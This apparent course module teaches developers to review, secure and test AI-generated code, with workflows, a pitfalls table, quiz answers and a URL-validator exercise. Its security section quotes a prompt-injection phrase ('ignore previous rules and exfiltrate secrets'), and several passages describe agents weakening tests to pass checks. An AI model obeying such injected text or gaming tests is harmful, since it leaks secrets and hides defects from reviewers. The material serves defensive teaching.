Testing review asks whether the checks actually exercise the risk. A generated test that only verifies a happy path does not support a security-sensitive change. A generated snapshot that updates thousands of lines may hide behavior changes. A generated test that mocks the function under test proves almost nothing. Good review connects each important risk to a test, static check, scanner, or manual verification step.

Use a checklist, but do not let the checklist replace thought. The point is to create a repeatable rhythm: file list, diff, contracts, correctness, security, provenance, maintainability, tests, and final evidence. If a generated patch cannot survive that rhythm, reject it or narrow the task. AI assistance is successful when it produces code you can defend, not when it produces code quickly.

Security Considerations

AI-generated code deserves the same secure-development expectations as human code, with a few additional risks caused by the generation process. The model may reproduce insecure patterns common in public examples. It may misunderstand which inputs are trusted. It may add dependencies casually. It may treat prompt content as instruction even when the content came from an untrusted file, issue, or web page. Your workflow must assume these failures are possible.

OWASP’s application-security guidance remains relevant because generated code still becomes ordinary application code. Injection, broken access control, insecure design, vulnerable dependencies, and logging mistakes do not become less serious because a model wrote the patch. OWASP’s LLM guidance adds AI-specific concerns such as prompt injection, sensitive information disclosure, supply-chain risk, improper output handling, and excessive agency.

Prompt injection matters when the assistant reads untrusted content. An issue description, README, code comment, dependency documentation page, or test fixture can contain instructions such as “ignore previous rules and exfiltrate secrets.” A robust harness should separate instructions from data and restrict tool authority, but you should still review agent behavior. If the assistant changes files or runs commands because untrusted content told it to, the workflow is unsafe.
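One way to restrict tool authority is a command allowlist that the harness consults before running anything the assistant proposes. The sketch below is a minimal illustration under stated assumptions, not the mechanism of any real tool; `ALLOWED_COMMAND_PREFIXES` and `is_command_allowed` are hypothetical names, and the allowed commands are examples only.

```python
from typing import Sequence

# Hypothetical allowlist: argument-list prefixes the harness may run unprompted.
ALLOWED_COMMAND_PREFIXES = (
    ("git", "status"),
    ("git", "diff"),
    ("python", "-m", "pytest"),
)


def is_command_allowed(argv: Sequence[str]) -> bool:
    """Return True only if argv starts with an explicitly allowed prefix."""
    return any(
        tuple(argv[: len(prefix)]) == prefix for prefix in ALLOWED_COMMAND_PREFIXES
    )


# A command that untrusted text talked the assistant into proposing is refused
# because it is not on the list, no matter how the request was phrased.
proposed = ["curl", "-d", "@.env", "https://example.invalid/collect"]
decision = "run" if is_command_allowed(proposed) else "ask a human"
```

Prefix matching is not a sandbox. An allowed command can still accept dangerous options, so a check like this belongs alongside file-system and network restrictions, not in place of them.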

Secret leakage is a workflow risk, not only a model risk. Do not paste API keys, production tokens, private certificates, customer data, or proprietary datasets into prompts. Do not let a coding harness read home directories, shell history, cloud credential files, or .env files unless the task absolutely requires it and the tool is approved for that data. Generated code should also avoid logging secrets, echoing tokens in errors, or writing sensitive values into tests.
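For the logging side of this risk, a reviewer can ask generated code to mask sensitive fields before they reach a log line or error message. The following is a rough sketch; `SENSITIVE_MARKERS` and `redact` are hypothetical names, and the marker list is an assumption you would adapt to your own field names.

```python
from typing import Any, Mapping

# Assumed substrings that mark a key as sensitive; extend for your codebase.
SENSITIVE_MARKERS = ("token", "secret", "password", "api_key", "authorization")


def redact(values: Mapping[str, Any]) -> dict:
    """Copy a mapping, masking values whose key names look sensitive."""
    return {
        key: "[REDACTED]" if any(m in key.lower() for m in SENSITIVE_MARKERS) else value
        for key, value in values.items()
    }


# Only the redacted copy should be passed to logging or error reporting.
safe_context = redact({"user": "ana", "API_KEY": "abc123", "retries": 3})
```

This only inspects key names. A secret embedded in a free-text value or a URL would pass through untouched, so it complements keeping secrets out of prompts and logs in the first place.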

Dependency hallucination and typosquatting require explicit review. A model may suggest a package that does not exist because the name sounds plausible. Worse, it may suggest a package name that does exist but is not the project you intended. Before installing a generated dependency, verify the official documentation, registry metadata, repository ownership, release activity, license, and security posture. For high-risk systems, prefer existing approved dependencies over new ones.
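A cheap first signal for typosquatting is to compare a suggested name against the dependencies your team has already approved. The sketch below uses the standard-library `difflib` module; `APPROVED_PACKAGES`, `classify_dependency`, and the 0.8 cutoff are illustrative assumptions, not a vetted policy.

```python
import difflib
from typing import AbstractSet

# Hypothetical allowlist of dependencies the team has already reviewed.
APPROVED_PACKAGES = frozenset({"requests", "numpy", "pytest"})


def classify_dependency(
    name: str,
    approved: AbstractSet[str] = APPROVED_PACKAGES,
    cutoff: float = 0.8,
) -> str:
    """Flag names that are close to, but not the same as, an approved package."""
    normalized = name.strip().lower().replace("_", "-")
    if normalized in approved:
        return "approved"
    near = difflib.get_close_matches(normalized, sorted(approved), n=1, cutoff=cutoff)
    if near:
        return f"suspicious: resembles {near[0]}"
    return "unknown: needs manual review"
```

For example, `classify_dependency("reqeusts")` reports a resemblance to `requests`, while an unrelated name falls through to manual review. Name similarity says nothing about ownership, maintenance, or license, so the registry and repository checks described above still apply.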

Command injection remains a common generated-code hazard. If user input flows into a shell string, reject the code unless there is a compelling reason and strong escaping. Prefer argument arrays with subprocess.run([...], check=True) in Python and equivalent structured APIs in other languages. Even then, validate file paths, restrict allowed operations, set timeouts where appropriate, and avoid passing secrets through command-line arguments that may appear in process listings.
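The argument-array pattern can be sketched as follows. `run_tool` is a hypothetical helper, and the ten-second default timeout is an arbitrary assumption. The demonstration invokes the current Python interpreter so that it runs without any external program.

```python
import subprocess
import sys
from typing import List


def run_tool(args: List[str], timeout_seconds: float = 10.0) -> str:
    """Run a command from an argument list, never from a shell string."""
    if not args or not all(isinstance(a, str) for a in args):
        raise ValueError("args must be a non-empty list of strings")
    completed = subprocess.run(
        args,
        check=True,            # raise CalledProcessError on a non-zero exit
        capture_output=True,
        text=True,
        timeout=timeout_seconds,  # raise TimeoutExpired instead of hanging
    )
    return completed.stdout


# Hostile-looking input stays one argument; no shell is involved to interpret ";".
hostile = "report.txt; echo INJECTED"
output = run_tool([sys.executable, "-c", "import sys; print(sys.argv[1])", hostile])
```

Because no shell parses the string, the child process receives the whole value as a single argument and prints it back unchanged. The called program can still misuse its arguments, which is why validation of paths and allowed operations remains necessary.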

SQL and query injection require the same skepticism. Generated code should use parameterized queries, ORM-safe filters, prepared statements, or query builders that separate data from code. Watch for f-strings, string concatenation, template literals, or manual escaping around user input. A generated test suite should include malicious-looking inputs, not because the exact string proves security, but because it prevents obvious regressions.
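As a minimal illustration of separating data from query text, the sketch below uses the standard-library `sqlite3` module with a `?` placeholder. The `users` table and `find_user_id` function are hypothetical, and other database drivers use different placeholder styles.

```python
import sqlite3
from typing import Optional


def find_user_id(conn: sqlite3.Connection, username: str) -> Optional[int]:
    """Look up a user with a bound parameter instead of string formatting."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ?", (username,)
    ).fetchone()
    return None if row is None else row[0]


# In-memory database so the example leaves nothing behind.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL)")
conn.execute("INSERT INTO users (username) VALUES (?)", ("alice",))

# The malicious-looking value is compared as plain data and matches no row.
injected = find_user_id(conn, "alice' OR '1'='1")
```

A regression test built on an input like this does not prove the query layer is safe, but it fails loudly if someone later replaces the placeholder with string concatenation.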

File handling is another hotspot. Generated code often reaches for open(filename) because that is the simplest public example. For user-controlled paths, require resolution against an allowed base directory, rejection of absolute paths and parent traversal, size limits before reading, safe archive extraction, and careful cleanup of temporary files. Tests should include traversal attempts and oversized inputs, not only valid files.
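The path checks described above might look like the following sketch. `UnsafePathError`, `resolve_inside`, `read_limited`, and the one-megabyte `MAX_BYTES` limit are hypothetical choices for illustration, and archive extraction is out of scope here.

```python
import tempfile
from pathlib import Path

MAX_BYTES = 1_000_000  # assumed limit; choose one that fits your service


class UnsafePathError(ValueError):
    """Raised when a user-supplied path or file violates the policy."""


def resolve_inside(base_dir: Path, user_path: str) -> Path:
    """Resolve user_path under base_dir, rejecting absolute paths and traversal."""
    candidate = Path(user_path)
    if candidate.is_absolute():
        raise UnsafePathError("absolute paths are not allowed")
    base = base_dir.resolve()
    resolved = (base / candidate).resolve()
    try:
        resolved.relative_to(base)  # raises ValueError if outside base
    except ValueError as exc:
        raise UnsafePathError("path escapes the base directory") from exc
    return resolved


def read_limited(base_dir: Path, user_path: str, max_bytes: int = MAX_BYTES) -> bytes:
    """Read at most max_bytes from a file inside base_dir."""
    target = resolve_inside(base_dir, user_path)
    with target.open("rb") as handle:
        data = handle.read(max_bytes + 1)  # one extra byte detects oversize files
    if len(data) > max_bytes:
        raise UnsafePathError("file exceeds the size limit")
    return data


# Demonstration in a throwaway directory: one valid read, three rejected paths.
with tempfile.TemporaryDirectory() as tmp:
    base = Path(tmp)
    (base / "ok.txt").write_bytes(b"hello")
    allowed = read_limited(base, "ok.txt")
    rejected = []
    for attempt in ("../secrets.txt", "/etc/passwd", "nested/../../escape"):
        try:
            resolve_inside(base, attempt)
        except UnsafePathError:
            rejected.append(attempt)
```

Resolving before comparing means symbolic links and `..` segments are collapsed first, so the containment check applies to the location that would actually be opened.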

License and provenance concerns are durable even as vendor policies change. Generated code becomes part of your repository, so your team remains responsible for whether it is compatible with your license obligations. Some tools offer public-code matching or indemnity features under certain plans, but those product details are volatile and not a substitute for review. Treat unusual or lengthy generated snippets as material that may need provenance checking.

Security review should happen before merge, not after production feedback. A practical minimum is to inspect the diff manually, run the relevant unit tests, run the project’s static checks, scan dependency changes, and require human approval for security-sensitive code. For generated changes that touch authentication, authorization, cryptography, payment, personal data, deployment, or secrets, use a higher bar and involve the appropriate reviewer.

Advanced Techniques and Workflows

Advanced code generation is less about longer prompts and more about better decomposition. Large tasks fail when the model tries to solve architecture, implementation, tests, migration, and documentation in one pass. Decompose the work into phases that each produce a reviewable artifact. A plan can be reviewed before code exists. Tests can be reviewed before implementation. A migration can be split by module. Documentation can wait until behavior is stable.

One useful workflow is plan-first generation. Ask the assistant to inspect context and propose a file-scoped plan without editing. Review the plan for scope, missing risks, invented dependencies, and test strategy. Only then allow a patch. This is especially useful with agentic harnesses because it gives you a chance to catch overreach before the tool modifies files.

Before editing, inspect the repository and propose a plan.

Your plan must include:
- Files you intend to read.
- Files you intend to change.
- Behavior that must remain stable.
- Tests or checks you will run.
- Risks you see in the task.

Do not edit files until the plan is approved.
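Once a plan lists the files it intends to change, part of the scope review can be mechanical. The sketch below compares planned paths against patterns the task allows; `out_of_scope`, the patterns, and the file names are hypothetical examples.

```python
from fnmatch import fnmatch
from typing import Iterable, List


def out_of_scope(planned_changes: Iterable[str], allowed_patterns: Iterable[str]) -> List[str]:
    """Return planned file paths that match none of the allowed patterns."""
    patterns = list(allowed_patterns)
    # Note: fnmatch's "*" also matches "/" so "src/importer/*.py" covers subfolders.
    return [
        path for path in planned_changes
        if not any(fnmatch(path, pattern) for pattern in patterns)
    ]


# Hypothetical plan for a CSV import task that also wants to touch packaging.
plan_files = ["src/importer/csv_reader.py", "tests/test_csv_reader.py", "pyproject.toml"]
violations = out_of_scope(plan_files, ["src/importer/*.py", "tests/test_*.py"])
```

Here `violations` contains only `pyproject.toml`, which is a prompt to ask why the plan needs a packaging change before approving it. A clean result does not approve the plan; it only removes one category of surprise.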

Another workflow is critique-first generation. Use one assistant or mode to draft code and another read-only pass to critique it. The critique should focus on concrete risks: edge cases, security, dependency changes, test gaps, and local convention mismatches. Do not ask for a vague “review.” Ask for findings grounded in file paths and behavior. Then verify the critique yourself because reviewers can hallucinate too.

CI-embedded generation is powerful but dangerous. A workflow that opens automated pull requests for dependency updates, API migrations, or test repairs can save time, but it must not merge itself. The generated PR should include the prompt or task contract, the diff, the checks it ran, and any known limitations. Human review remains the authority boundary. CI is a place to produce evidence, not to hide authorship.

Multi-step agent workflows should preserve state through artifacts rather than memory alone. Ask the assistant to write a short plan, update a checklist, and summarize decisions in the PR or task notes. This gives future reviewers something stable to inspect. It also helps when the model context resets or a different tool continues the work. The artifact should be factual and concise, not a transcript of every token.

For local-versus-frontier model tradeoffs, choose based on task risk and data boundary. A local model can be attractive for private code, predictable cost, and low-latency completions, but it may struggle with complex reasoning or large migrations. A frontier hosted model may produce better plans and patches, but it requires data-policy approval and cost controls. The harness should make either choice reviewable through the same diff and test loop.

Determinism is limited because generation is probabilistic, but the workflow can still be deterministic. Pin dependencies, write tests, record commands, keep prompts in PR descriptions when appropriate, and avoid relying on generated output that cannot be reproduced or reviewed. You do not need the model to produce the same text twice. You need the repository to prove that the accepted patch behaves correctly.
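Recording commands can be as simple as capturing each check's arguments and exit code in a structured note for the PR. The following is a sketch under assumptions: `record_check` is a hypothetical helper, the record fields are illustrative, and the demonstration runs the current Python interpreter instead of a real test suite.

```python
import json
import subprocess
import sys
from typing import Any, Dict, List


def record_check(args: List[str], timeout_seconds: float = 120.0) -> Dict[str, Any]:
    """Run one check and return a small, serializable evidence record."""
    # No check=True here: a failing check is evidence too, not an exception.
    completed = subprocess.run(
        args, capture_output=True, text=True, timeout=timeout_seconds
    )
    return {
        "command": args,
        "exit_code": completed.returncode,
        "passed": completed.returncode == 0,
        "stdout_tail": completed.stdout[-2000:],  # keep the record short
    }


# Stand-in for a real check such as running the project's test suite.
evidence = [record_check([sys.executable, "-c", "print('ok')"])]
report = json.dumps(evidence, indent=2)
```

The resulting JSON can be pasted into a PR description or stored as a build artifact, which gives reviewers the exact commands to rerun.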

Finally, use manual edits without apology. A common beginner mistake is to keep prompting for a perfect patch when a two-line human edit would finish the job. AI generation is a drafting tool, not a ritual. If review reveals a small issue, fix it directly, run the checks, and move on. The standard is maintainable code with evidence, not maximal model involvement.

Did You Know?

Dated snapshot, model menus (as of 2026-06; verify before relying on it): GitHub Copilot documentation lists multiple model providers and release statuses, and warns that model availability can change over time.
Dated snapshot, hosted agents (as of 2026-06; verify before relying on it): OpenAI describes Codex as a coding agent available through local and cloud-oriented workflows, with development environments and tests treated as important context for agent performance.
Dated snapshot, editor modes (as of 2026-06; verify before relying on it): Cursor documentation describes modes with different tool authority, including read-only exploration, direct edits, and agentic workflows that can use broader tools.
Security framing: OWASP’s LLM guidance treats prompt injection and improper output handling as application risks, which maps directly onto generated-code workflows that read untrusted text and turn model output into executable code.

Common Mistakes and Pitfalls

AI code generation fails in predictable ways. The mistakes below are not reasons to avoid the tools; they are review prompts. If you can name the failure mode, you can design the prompt, harness permissions, tests, and review checklist to catch it before it becomes a merged change.

Mistake	Why It Happens	Better Approach
Trusting generated code blindly	The output is syntactically polished, so reviewers mistake fluency for correctness.	Treat every generated patch as plausible, untrusted code until diff review and tests support it.
Asking for broad rewrites	Vague goals such as “modernize this” let the model invent architecture and compatibility changes.	State allowed files, stable contracts, forbidden changes, and evidence before generation begins.
Reviewing only the implementation	Generated tests can be weak, tautological, or aligned to the model’s mistaken assumptions.	Review tests as design artifacts, then run them against the intended behavior and risk cases.
Ignoring harness authority	Developers blame the model for failures caused by missing context or excessive write permissions.	Separate model capability from harness scope, command authority, file access, and approval mode.
Accepting new dependencies casually	Models suggest plausible package names and popular patterns without checking supply-chain risk.	Verify package identity, maintenance, license, registry source, and need before installation.
Skipping security constraints	Public examples often show the shortest path, not the safest handling of untrusted input.	Put validation, parameterization, path safety, secret handling, and abuse cases into the prompt and tests.
Letting agents weaken evidence	A tool may edit tests, snapshots, or config to make checks pass instead of fixing behavior.	Inspect test diffs first, reject weakened assertions, and require checks that match the original task.
Treating product claims as stable	Model names, quotas, prices, and features change faster than engineering principles.	Date volatile facts, cite official docs, and base durable workflow decisions on authority and evidence.

The most damaging version of blind trust is accepting code because the assistant also explained it confidently. Explanations are generated artifacts too. They may describe code that the assistant intended to write rather than code that actually landed in the diff. Always inspect the patch itself before relying on the narrative around it.

Overbroad prompting is especially tempting during refactors. A model can produce a large diff that appears productive, and the size of the patch can create social pressure to keep it. Resist that pressure. If the task was to extract one helper and the patch also changes logging, error messages, dependencies, and formatting, the correct response is usually to narrow the prompt and regenerate or manually recover the useful part.

Dependency mistakes deserve a higher level of suspicion because they extend the blast radius beyond your code. A generated package suggestion can introduce licensing obligations, abandoned maintenance, malicious typosquatting, native build failures, or transitive vulnerabilities. Even when the dependency is legitimate, it may be unnecessary if the standard library or an existing project dependency already solves the problem.

Test weakening is subtle. A generated patch may replace exact assertions with truthiness checks, update snapshots without explanation, remove edge cases that fail, or mock away the behavior under test. These changes can make CI green while reducing confidence. When reviewing generated code, read test diffs before implementation diffs if the assistant claims that tests were updated.
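Reading test diffs first can be supported by a small scan that lists assertions removed from test files. This is a rough sketch that assumes `git diff` style unified output and treats any path containing "test" as a test file; `removed_assertions` and `SAMPLE_DIFF` are hypothetical.

```python
from typing import List, Tuple


def removed_assertions(diff_text: str) -> List[Tuple[str, str]]:
    """Return (file, line) pairs for assert statements deleted from test files."""
    findings = []
    current_file = ""
    in_hunk = False
    for line in diff_text.splitlines():
        if line.startswith("diff --git "):
            in_hunk = False  # a new file section begins with header lines
        elif not in_hunk and line.startswith("+++ "):
            path = line[4:].strip()
            current_file = path[2:] if path.startswith("b/") else path
        elif line.startswith("@@"):
            in_hunk = True
        elif in_hunk and line.startswith("-"):
            removed = line[1:].strip()
            if "test" in current_file and removed.startswith(("assert ", "assert(")):
                findings.append((current_file, removed))
    return findings


# Hypothetical diff: an exact assertion is replaced by a truthiness check.
SAMPLE_DIFF = """\
diff --git a/tests/test_cart.py b/tests/test_cart.py
--- a/tests/test_cart.py
+++ b/tests/test_cart.py
@@ -10,4 +10,4 @@ def test_total():
     cart = Cart()
     cart.add(2, 5)
-    assert cart.total() == 10
+    assert cart.total()
diff --git a/src/cart.py b/src/cart.py
--- a/src/cart.py
+++ b/src/cart.py
@@ -1,3 +1,3 @@
-    assert isinstance(qty, int)
+    qty = int(qty)
"""
findings = removed_assertions(SAMPLE_DIFF)
```

The scan reports the weakened test assertion and ignores the change in `src/cart.py`. It cannot judge whether a removal was justified, and it misses snapshot edits and mocks, so it narrows where to look without replacing the human reading of the diff.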

Context flooding is the opposite mistake from under-specification. Pasting thousands of unrelated lines can dilute attention and increase hallucination. Provide the target function, direct dependencies, relevant types, nearby examples, and the behavior contract. If the task requires broader repository knowledge, use a harness that can search deliberately rather than dumping the entire codebase into a prompt.

Finally, do not confuse local generation with safe generation. Running a model locally can help with data-boundary concerns, but it does not automatically prevent insecure code, license issues, or wrong business logic. Local versus hosted is a deployment choice. Review remains the quality boundary.

Legal and Ethical Constraints

Generated code does not remove authorship responsibility from the team that commits it. If the code lands in your repository, your project owns the maintenance burden, security consequences, and license compatibility questions. Vendor features may help detect public-code matches or provide enterprise protections under certain terms, but those features vary by product and plan. They should supplement, not replace, ordinary legal and engineering review.

The most practical legal rule is to be cautious with large or distinctive generated blocks. A short implementation of a standard algorithm is usually less concerning than a long block with unusual structure, comments, names, or formatting that looks copied from a specific project. If the output appears distinctive, search for matches, ask for a different implementation, or write the code manually from the idea rather than accepting the exact text.

Ethical use also includes disclosure and review norms. Teams should decide when AI assistance needs to be mentioned in pull requests, how prompts or task contracts are recorded, and which categories of work require heightened review. A tiny generated docstring may not need special process. An AI-generated authentication change should be obvious to reviewers and backed by tests, threat-model notes, and security review.

Data use policies matter because prompts can contain source code, customer examples, logs, stack traces, and internal architecture. Before using hosted generation on private repositories, verify organizational policy and tool settings. Some products offer enterprise controls, content exclusion, audit logs, or data-use settings, but the exact terms are volatile. The durable practice is to know what data leaves the machine and who is allowed to process it.

There is also an ethical review issue around accountability. A generated patch can shift blame psychologically: “the model wrote it” sounds different from “we merged it.” Production systems do not care. Users experience the behavior your team ships. Keep accountability with the human process, and use AI assistance only where the team can review, test, and maintain the result.

Knowledge Check

Question 1: A developer asks an assistant to "write a login function" and receives code that concatenates user input into a SQL string. What failed: the model, the prompt, the harness, or the review?

Several layers failed, but the review failure is the decisive one. The prompt failed to state security constraints such as parameterized queries, password hashing, rate limiting, and logging. The model produced a common insecure pattern. The harness may have made the code easy to apply. The reviewer still had the final chance to reject generated code that put untrusted input into executable SQL.

Question 2: An IDE assistant generates a clean refactor that changes public error messages and updates snapshots to match. The test suite passes. Why is this still risky?

The passing tests may now reflect the assistant’s changed behavior rather than the original contract. Public error messages can be part of an API if clients, documentation, or support workflows depend on them. A correct review would inspect test diffs, check whether snapshots were updated intentionally, and require explicit approval for any user-visible compatibility change.

Question 3: A local model produces worse code than a hosted model for a cross-file migration, but the team still chooses the local setup for some tasks. When is that reasonable?

That choice is reasonable when data-boundary, cost, latency, or offline constraints matter more than maximum reasoning quality and the task fits the local model’s strengths. Local generation can work well for small pure functions, repetitive patterns, summaries, and autocomplete. The team should still use the same diff review and tests because local execution does not guarantee correctness.

Question 4: A generated API client handles successful responses but crashes on intermittent network failures in production. What should have been included in the generation and review workflow?

The task contract should have required timeout handling, retry policy, HTTP error handling, and tests for failure responses. The missing element was a deterministic generate-review-test loop that turned the model’s draft into source-controlled evidence. Review should have checked that the client never assumes a perfect network and that the tests simulate timeouts or server errors without calling a live service.

Question 5: A terminal agent claims it fixed a bug, but the diff shows a removed assertion in the failing test. How should you respond?

Reject the patch or isolate the legitimate implementation changes from the weakened test. A generated fix is not acceptable if it makes evidence less meaningful. The next prompt should restate that existing assertions must be preserved unless the behavior contract is explicitly changed, and the reviewer should run the original failing case again after the implementation is corrected.

Question 6: A model suggests installing a package whose name resembles a popular dependency but does not appear in official framework documentation. What review steps are appropriate?

Treat the suggestion as untrusted. Verify the package identity in the official registry, inspect the linked repository, check maintainer and release history, review the license, scan for known security concerns, and ask whether an existing approved dependency or standard-library feature already solves the task. If the dependency cannot be justified, do not install it.

Hands-On Exercise: Generate, Review, and Verify a URL Utility

This exercise uses deterministic files so you can practice the review loop without depending on a live model response. You will start with a plausible generated implementation, review it as untrusted code against review-driven tests that are already provided, gather evidence by running the suite, and then improve the generation prompt so a future draft would capture the missing constraints. The point is not that URL validation is glamorous. The point is that a small parser has enough edge cases to show why generated code must be reviewed.

Task 1: Create the Lab Workspace

Run the setup from a scratch directory outside any production repository. The commands create a tiny package, install pytest, and keep the generated artifact small enough to review line by line. If your system uses a different Python launcher, adapt the venv creation step, but keep the test and execution commands inside the virtual environment.

mkdir url_generation_review_lab
cd url_generation_review_lab
python3 -m venv .venv 2>/dev/null || python -m venv .venv
.venv/bin/python -m pip install --upgrade pip pytest
mkdir -p url_tools tests
touch url_tools/__init__.py

Task 2: Start With a Plausible Generated Draft

Imagine the prompt was: “Generate a small Python URL utility with validation, parsing, and normalization using only the standard library.” The output below is plausible and syntactically clean. It is also under-specified. Copy it into url_tools/validator.py, then review it before running the provided tests. Look for assumptions about schemes, hosts, ports, credentials, and whitespace.

from __future__ import annotations

from dataclasses import dataclass
from urllib.parse import urlparse, urlunparse


class URLValidationError(ValueError):
    """Raised when a URL cannot be parsed safely."""


@dataclass(frozen=True)
class ParsedURL:
    scheme: str
    host: str
    port: int | None
    path: str
    query: str


class URLValidator:
    allowed_schemes = {"http", "https"}

    def is_valid(self, url: str) -> bool:
        try:
            self.parse(url)
        except (TypeError, URLValidationError):
            return False
        return True

    def parse(self, url: str) -> ParsedURL:
        if not isinstance(url, str):
            raise TypeError("url must be a string")
        cleaned = url.strip()
        parsed = urlparse(cleaned)
        if parsed.scheme.lower() not in self.allowed_schemes:
            raise URLValidationError("unsupported URL scheme")
        if not parsed.hostname:
            raise URLValidationError("URL must include a host")
        if parsed.username or parsed.password:
            raise URLValidationError("credentials are not allowed in URLs")
        try:
            port = parsed.port
        except ValueError as exc:
            raise URLValidationError("invalid port") from exc
        return ParsedURL(
            scheme=parsed.scheme.lower(),
            host=parsed.hostname.lower(),
            port=port,
            path=parsed.path or "/",
            query=parsed.query,
        )

    def normalize(self, url: str) -> str:
        parsed = self.parse(url)
        netloc = parsed.host
        if parsed.port is not None:
            netloc = f"{netloc}:{parsed.port}"
        return urlunparse((parsed.scheme, netloc, parsed.path, "", parsed.query, ""))

Task 3: Review-Driven Tests (Provided)

The tests below encode review decisions that the original broad prompt did not mention. They pin down normalization of valid URLs and reject credentials in URLs, unsupported schemes, missing hosts, invalid ports, empty strings, and non-string input. Copy them into tests/test_validator.py. Read each test before running it and ask whether it protects a behavior you would actually want in a service that consumes user-supplied URLs.

import pytest

from url_tools.validator import URLValidationError, URLValidator


@pytest.fixture
def validator() -> URLValidator:
    return URLValidator()


@pytest.mark.parametrize(
    ("raw_url", "expected"),
    [
        ("HTTPS://Example.COM", "https://example.com/"),
        ("https://example.com:8443/path?q=1", "https://example.com:8443/path?q=1"),
    ],
)
def test_normalize_valid_urls(validator: URLValidator, raw_url: str, expected: str) -> None:
    assert validator.normalize(raw_url) == expected


@pytest.mark.parametrize(
    "raw_url",
    [
        "ftp://example.com/file.txt",
        "https:///missing-host",
        "https://user:secret@example.com",
        "https://example.com:99999",
        "",
    ],
)
def test_rejects_unsafe_or_malformed_urls(validator: URLValidator, raw_url: str) -> None:
    assert not validator.is_valid(raw_url)
    with pytest.raises(URLValidationError):
        validator.parse(raw_url)


def test_non_string_input_is_type_error(validator: URLValidator) -> None:
    with pytest.raises(TypeError):
        validator.parse(None)  # type: ignore[arg-type]

Task 4: Run the Evidence

Execute the test suite and treat failures as review feedback. If you edited the implementation, rerun the tests after each small change. The evidence matters because a generated explanation of why the code is safe is not the same as executable checks that exercise the safety boundaries.

.venv/bin/python -m pytest tests -q

Success criteria:

The test suite passes without weakening assertions.
The implementation uses only the standard library.
Unsupported schemes, credentials, missing hosts, invalid ports, and non-string input are tested.
You can explain one assumption the original prompt failed to state.
You inspected the implementation before trusting the tests.

Task 5: Improve the Prompt

After the tests pass, write a better generation prompt for the same utility. The improved prompt should mention allowed schemes, credential rejection, invalid port behavior, path normalization, type errors, dependency limits, and test categories. This final step matters because prompt improvement is part of the loop. You are not only fixing one generated output; you are learning how to prevent the same class of weak draft next time.

Learner check

The durable skill is not “getting code from a model.” The durable skill is turning an uncertain draft into a reviewed, tested, source-controlled patch.

Use that sentence as the review standard for the exercise. If the code is generated but not reviewed, tested, and controlled through ordinary repository workflow, the generation step is unfinished. A useful assistant speeds up the path to evidence; it does not replace the evidence.

Next Module

Next, continue to Module 1.8: AI-Assisted Debugging & Optimization. You now have a generate-review-test loop; the next module applies the same discipline to diagnosis, profiling, and optimization work.

Sources

Module 1.1: AI Coding Tools Landscape — Local Rosetta-stone context for AI coding tool families and authority boundaries.
OWASP Top 10 2025: A05 Injection — Standard application-security reference for injection risks that generated code can introduce.
OWASP Top 10 for LLM Applications 2025 — Reference for prompt injection, improper output handling, excessive agency, and AI supply-chain risks.
NIST SP 800-218 Secure Software Development Framework — Source for secure-development practices that still apply when code is AI-assisted.
SLSA Provenance — Background on provenance as a software supply-chain concept.
OpenSSF Scorecard — Reference for dependency and project-health review signals.
GitHub Copilot: Supported AI models (redirects to the supported-models page) — Dated snapshot source for model availability volatility in a coding harness.
GitHub Copilot: Understanding requests — Dated snapshot source for request and billing terminology.
OpenAI: Introducing Codex — Dated snapshot source for Codex positioning as a software-engineering agent.
OpenAI: Unrolling the Codex agent loop — Source on Codex CLI, local agent loops, and terminology around Codex offerings.
Anthropic Claude Code getting started — Dated snapshot source for a terminal coding-agent harness example.
Cursor modes documentation — Dated snapshot source for editor-agent modes and differing tool authority.
Gemini Code Assist overview — Dated snapshot source for Google coding-assistant capabilities.
Amazon Q Developer tiers — Dated snapshot source for AWS coding-assistant tiers and interface availability.
Tabnine deployment options — Dated snapshot source for private and on-premises assistant deployment options.